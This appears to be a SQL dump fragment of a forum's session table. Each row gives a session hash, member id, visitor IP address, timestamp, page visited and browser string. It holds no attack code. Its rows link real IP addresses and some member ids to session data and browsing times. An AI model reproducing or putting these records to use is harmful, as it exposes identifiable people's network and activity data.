('e20dd1bc73e024e2200f3be58f6d86c4', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465633715, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('2f00e69842e5e0c9446c2cfe6657e895', 0, '94.213.161.154', 'ca93f5ee33b435b71e3b518dd224c87f', 1465666054, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('dc1b856579087d4c5c375f841916a285', 0, '79.115.46.58', '7ce10db3cdc195e22f3a01e81f76bc18', 1465639501, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9fe34e1ccbfd637f6d642c640bb3c955', 0, '83.143.240.19', '20815b12e0a4a7097449e4df2e7a53d4', 1465639818, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8c040ec11cb0355d30781b9bf01ae8ac', 0, '188.213.166.112', '0c8a4960409b833339e765d185377375', 1465640521, '/search.php?do=getdaily', '4343.19;', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e8eee646dd54d9cb723957f7758133c7', 0, '46.202.145.72', '0c00a64fec762c287a2d0a5129f1083d', 1465641966, '/index.php', 'Mozilla/5.0 (Linux; Android 4.2.2; Lenovo A369i Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('435081a4c3c53fc912de0d9c1d025f7c', 0, '172.68.10.250', 'e8119b251be7ad5baa3ce33e001682f9', 1465649455, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d167f48a1fda2d16dc18babe82723287', 0, '172.68.10.250', 'e8119b251be7ad5baa3ce33e001682f9', 1465642752, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2d178ce06bd7cc19a1ead3baff08f24d', 0, '2a02:598:2::101', '2a8ac383a7a1f23d029cabb5b044cbb3', 1465643204, '/search.php?do=getnew', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('de4b648926560b39fe37a276dcd0a6a6', 0, '88.123.188.51', '35d00f8811ab3361e1e9d4c37b94a35a', 1465729701, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0ef54b850899ad2d7a9c83f4f8bc6131', 0, '41.227.252.173', '9522d732c5c898bb0a1cbd11ad7bcaa4', 1465646186, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1ad8955cbf56aa18313a604c9a4d7ef0', 0, '178.162.199.100', '15bbdbf9dda1df5c3ddbd5dbc3bba40b', 1465648159, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c73680af11b347c89b9404e4371d6482', 0, '118.69.55.161', '8d6ba062568a162b33ebf4fbbe6f4bad', 1465654995, '/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('93517a27132e2da5cf3543a2c38aef82', 0, '2a02:c7d:7e62:6', '3d655c7218cc8d57b901d62e230377f0', 1465655051, '/register.php?', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e353257511b271389f97fe01c49144b4', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465659527, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('986fe89d542f6ee0c4d765597c50ff8a', 0, '95.107.200.110', '37c41ea0ee21ca78bbc0c74971ce80cc', 1465660156, '/register.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1bebff57f23dcbb710b8eb7ecb94a390', 0, '80.112.2.192', 'a224a79d6ed178a1f7304e1d2825bd1e', 1465663566, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cc82543219dd7250ce25c0d98d893b29', 0, '2a02:598:2::101', '534ad9252ff6f679ad96d16aac017d07', 1474327048, '/online.php?', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bb32306a8d5230fd11434d0d04b9cf55', 0, '157.55.39.178', '23f3103f44bc3badcba53554e5e4cb6d', 1465666823, '/register.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d836fb23c7fea9c8568bdef493dac98c', 0, '207.46.13.96', '5e207e311e22cdc3b2095126a922fa93', 1465666826, '/showthread.php?p=3017', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7650a0bfddf68279024dec3ea09504f3', 0, '157.55.39.202', '23f3103f44bc3badcba53554e5e4cb6d', 1465666880, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('029aceaa487e350218e4caaf63ed439b', 0, '5.9.158.75', 'c68873b846556fa5435c990fee98ff77', 1470055444, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f42cf1714d4ca72aeb916d3098954a74', 0, '149.202.57.31', 'e660348c36978fa386e11b38e4ecd063', 1467836798, '/index.php', 'Mozilla/5.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1448fe583819d28a224e77932d03d2d7', 0, '77.8.169.105', '0dcd8f1e7a63050dcb5fab929e2d1e50', 1465669814, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f77de12e6256f87bb70c21c0938433fd', 0, '2a02:598:2::166', 'f931c64e0b9206fad68a279757a78a2f', 1466999277, '/search.php?', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f6ad9633fe13bff6d58b7c219ee4450c', 0, '93.115.95.204', '71688f08f52d3c233b774891a3a0bfe1', 1465675653, '/index.php', '0.07856108733616485', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b69e7ad8691f6dbf95ff11ba56aa8984', 0, '130.149.80.71', 'f853e7e5f3039832f0da68ba7c662ce2', 1465677037, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ed97ec49a69ee2640ac29bb8cf204845', 0, '86.168.131.95', 'dafbc8ef3c346814a3151a779aa42c00', 1465677678, '/register.php?', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d7f369b567e0d7f668b45cbde2615f4b', 0, '178.223.179.61', 'f5295fc27570ea89415cf69b3cf9171e', 1465774537, '/member.php?find=lastposter&f=37', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fa925d15603541d49a9aefbfc32840db', 0, '95.169.190.59', 'ab69247b124dc31720ca381bf5b55f58', 1465681733, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('964893ada0dd978fe27a13d97c2ca9d0', 0, '46.19.230.14', 'e76b2dcb8cdadba2e37a87d2470e95bb', 1465683404, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f824c6337ff0ba6cdcb55928ed575461', 0, '124.211.192.245', '959d0dc130b33704512b1fada93036b1', 1465685241, '/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('971429f6531e2d8814553dd3fcadf7eb', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465685454, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('959dcfa933ce8063e6ad45592e4125f8', 3, '172.68.10.204', '31ccdbc1ef5bda32121764fbb3ceed7a', 1465686349, '/index.php', 'Mozilla/5.0 (Windows NT 8.0; WOW64) AppleWebKit/536.32 (KHTML, like Gecko) Chrome/37.0.2002.61 Safar', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('01695e273d72527271bd71feae8568bd', 0, '172.68.11.240', '22182666440a83aed20a91ad4a64a93b', 1465695950, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('98449ebe3ab49f0e895299cf9741bb75', 0, '2a02:598:2::163', 'b1cf5b59c9947a8598446c196f003f0b', 1471564284, '/search.php?do=getnew', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('63b3dab4f73df15762b0f5fcf4eb741e', 0, '2a02:598:a::78:', 'a146ffb894a977a60bdf9935536c2965', 1466816073, '/memberlist.php?', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5d372d8c326c6aa4af7f936d45f889ce', 0, '172.68.11.251', '0b6679442e636eb882b227b2c7ca211c', 1465702048, '/index.php/favico.ico', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ca14f144c39c860b69a2a1deb7ad63d1', 0, '81.94.22.59', '0b6679442e636eb882b227b2c7ca211c', 1465702048, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5baa42c685b2b222dc3c6508c51b2ca8', 0, '172.68.10.251', '0b6679442e636eb882b227b2c7ca211c', 1465702051, '/index.php/favicon.ico', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f4c612260db8e8b7394da4100123ff57', 0, '188.138.9.49', 'cbcd8c862994ddf20d9fb6ef88e3343a', 1465703919, '/forumdisplay.php?f=37', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ceb6b332d3a8c64a19b5e55df93f99d7', 0, '196.196.34.119', '13f5d92bcc72955c2fd9fc2a520b9dcf', 1465705488, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6ec3607089f90e290760e74a69c9bde1', 0, '197.0.80.186', '4bc3ac06674f792960e56db5f700b2f5', 1465706392, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d6e566448fd4e03f173aca321c7d6afb', 0, '123.151.192.145', 'ff4fbc7c1ec9de4b178f5eecca29eea6', 1465708236, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('06728bd3489c94e2d785b21ef5c8fbc3', 0, '176.14.207.72', 'dbcdfc39ada3a372f8c7ec2a7f094097', 1465710690, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d0770bf75b78da20211fc16603185c30', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465711955, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a61d05df5f863ebcf0271f26724b1bdb', 0, '193.90.12.86', '5793cdfd505830f01470a77f60788b16', 1465713756, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6ffd440c03ec535151061045aeabc33f', 0, '172.68.10.245', 'd42ab9c517f785abd97257b953f9cd9e', 1465715459, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8737eeea8260d6b81c7a6f16e7969a79', 0, '89.144.170.119', '8b8b515e4fb97d4731a8481ce0fcd607', 1465717057, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('85d865b7434372f2c0a2b633d36b7dee', 0, '89.144.170.119', '8b8b515e4fb97d4731a8481ce0fcd607', 1465717056, '/forumdisplay.php?f=32', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f9ba7b4f0ae40d7f1c425c367a8f4ac0', 0, '136.243.227.137', '8291bc91163ed526553b81a7a2de0180', 1465963680, '/forumdisplay.php?f=32', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e5aec5bb5a8fcfeb204f7ed8de3f5a7b', 0, '217.23.3.40', 'a5340bbd36e3fc53a0381857e774b01a', 1465717555, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a7f8fab1b14f44c8966924c8460b6520', 0, '2a02:598:2::168', '0c8c26b86f62b03b5afe8459d6717831', 1465718828, '/forumdisplay.php?f=32', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f8956f9ce1a78caae8e8924b643c20c8', 348, '172.68.11.247', 'f863a1334cf8f192871e6340dbef5d0e', 1465726989, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('081e65cf77e673ae3dc9c33578b452eb', 0, '87.9.192.190', 'a47408032acf3b3a3e6beab465e5f091', 1465736729, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.33', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8f3476eec55f901907cc089852b0e50f', 0, '172.68.25.54', 'c8549dd2d949e2c5c2f3c7fe77ace34d', 1465738403, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('48360bdc2dd7c4d3ce8d8e3e478bd312', 0, '188.25.31.122', 'fa7ac2268bc137a2ddef031e7f7bbcef', 1465738815, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9124239d212431a106763783146d6040', 0, '172.68.11.244', '58733add5df037ae62a76636f318ea5b', 1465739183, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0f28c76a572670091cc61e8417a65435', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465739195, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c175b40b263dcd4ef16e7fc47cc2dd60', 0, '89.238.186.142', '634169dfada7b4d978d0f82203fbb5a2', 1465739771, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b45c67930e13a456f63aca9358b93f77', 0, '65.75.104.65', '583cf9ab41f575b6f98efe4e85f74e29', 1465740275, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/8.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d0b63494cc498867a9594396a3a2bd26', 0, '116.97.181.166', '944f5a981cca6073deb236fa35dfa8f0', 1465744666, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('112a8c859ee63ecf6896ea0659527f07', 0, '212.55.91.122', '09bbcc2cb3bce95ab19ec2c6a5df4c4d', 1465748635, '/index.php', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f10074234ed3051fc8400e835026a80c', 0, '81.171.56.193', '8cec8f1218ae0a09bc789510d0e94352', 1465752125, '/showthread.php?p=3008', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('985598986b05c8d5ea14aeec757344bc', 0, '81.171.56.193', '5983038fd40cec321e39b1d84ffedd4e', 1465752139, '/showthread.php?t=2464', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c1165eb717c5077a55fc70075b30a81b', 0, '81.171.56.193', '89222dc558d4be0af1083424e0175ea0', 1465752146, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4ab74f594910058bedef5a2202d686d8', 0, '85.70.249.136', '63abab9a0dab47d3337755de4b2957cb', 1465752487, '/index.php', 'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('efde24b5166c65b54a48911180029961', 0, '149.202.57.217', 'e660348c36978fa386e11b38e4ecd063', 1466362168, '/index.php', 'Mozilla/5.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d4b43c9206d2769487396dca97c179e1', 0, '93.115.95.205', 'cd8db37898e09888be9a2b3662567b48', 1465759325, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2de7fa6c80763e2bc6293ed6cc564504', 0, '185.100.85.101', 'f0da8e89d35cd2428c6cf43ad6d350ab', 1465759473, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b1c282f2383c2965ccd3d410067828e4', 0, '163.172.38.175', 'fd0593ded7022c30e05b3a6f45ee04c4', 1465759659, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eabe3cf79b89a96c15814139732a82ff', 0, '77.247.181.163', '99091e3e983bd1550055c12fbd58a63d', 1472914035, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0016ce9261870a934fa3e1afcf928ccf', 0, '180.210.200.225', 'fe6d1fd8204d06e0dc5fdde0174f2290', 1465761723, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5164cfc03cee276310c3d8c6301cf6fe', 0, '180.180.77.23', '534bc9991188e91939a6acb53440ae0a', 1465762217, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('be775f9a0652cc9e5d76944a985de901', 0, '178.62.128.67', '1615c8ad04a73816b894b38ac4aeca49', 1465763316, '/index.php/favicon.ico', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6d412a5ce1d5b3307716fc3aabb187e5', 0, '178.62.128.67', '1615c8ad04a73816b894b38ac4aeca49', 1465763316, '/index.php/favico.ico', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fa045010f5c3acaa37fd9020f2261e25', 0, '178.62.128.67', '1615c8ad04a73816b894b38ac4aeca49', 1465763539, '/register.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('22b570aeb7aa7978a5251c3d6a41b79c', 0, '185.61.149.121', '3f109fc008d84752d708c27194030216', 1465955541, '/register.php', 'Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ee2b15b170e1726d5563fc24592ef1d2', 0, '2600:1016:b01b:', 'b2969764d5bce36b717d5ee10e3f8d36', 1465763742, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930V Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5e149cc438a86388c7063df3ae066b09', 0, '45.79.1.140', 'b5e5980796dbad19d5f685b04669cdce', 1465764530, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0 Cyberfox/46.0.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('64db667562d347de604ebc84e51eca55', 0, '82.76.203.185', '2857e64e06b9c46c5cd154cadc0e1644', 1465764578, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('39d92e8e62e0451354871f3bbaaf8234', 0, '93.28.226.149', '7de319848d2829a798c44adcbeb9f333', 1465765487, '/showthread.php?p=3005', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e93cde80240c970d667b62973b1a3e81', 0, '157.55.39.45', '23f3103f44bc3badcba53554e5e4cb6d', 1465767066, '/printthread.php?t=2342', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b23de6f66615fc831fb833020cbd827a', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465767192, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('f00306ae34e89e73187efdf046e2351f', 0, '2.98.50.213', '2b25ba4c566cecb1beb76cb0c1255f07', 1465767216, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ea95b211fdb2c31a828f94b7851246a8', 172, '2.187.49.176', '078481f34173448288270fc998ca3b68', 1465769999, '/member.php?u=172&tab=visitor_messaging', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('4f99d2571f7acca7df0756556c57adc4', 0, '82.145.221.57', 'ae1e8e3585a835d3b378a9e0aa62a17a', 1465770091, '/index.php', 'Opera/9.80 (iPhone; Opera Mini/13.0.1/37.8529; U; ru) Presto/2.12.423 Version/12.16', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('33cfddcf4fbad7dd8a43b180632c9950', 0, '212.48.90.88', '1f0a1fea10d27ba3223996d5d0ebeb27', 1465771673, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fa8d5d04770408aed0e1d9f7a03d079f', 0, '207.241.225.226', '9d0b3cf908a290b79727e65f3b099c80', 1465774412, '/index.php', 'Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/a', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d391e4b32a8bc3698e8c6b097d3d08ec', 0, '207.241.225.235', '9d0b3cf908a290b79727e65f3b099c80', 1467139753, '/archive/index.php/t-2346.html', 'Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/a', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('0d5bfc0fd9635c053c8133fde4294347', 0, '207.241.226.217', '6fffbe8f2087da04ca982e209b239d2d', 1465774481, '/forumdisplay.php?f=37', 'Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/a', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a621ef4d9ef38b82cb4305a175fbbb07', 0, '207.241.226.215', '6fffbe8f2087da04ca982e209b239d2d', 1467139761, '/archive/index.php/', 'Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/a', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('16b075118707f5421669394a6bac286b', 0, '207.241.226.230', '9e8c2fc16eae9a5004c6cf0fc8efef33', 1465774488, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
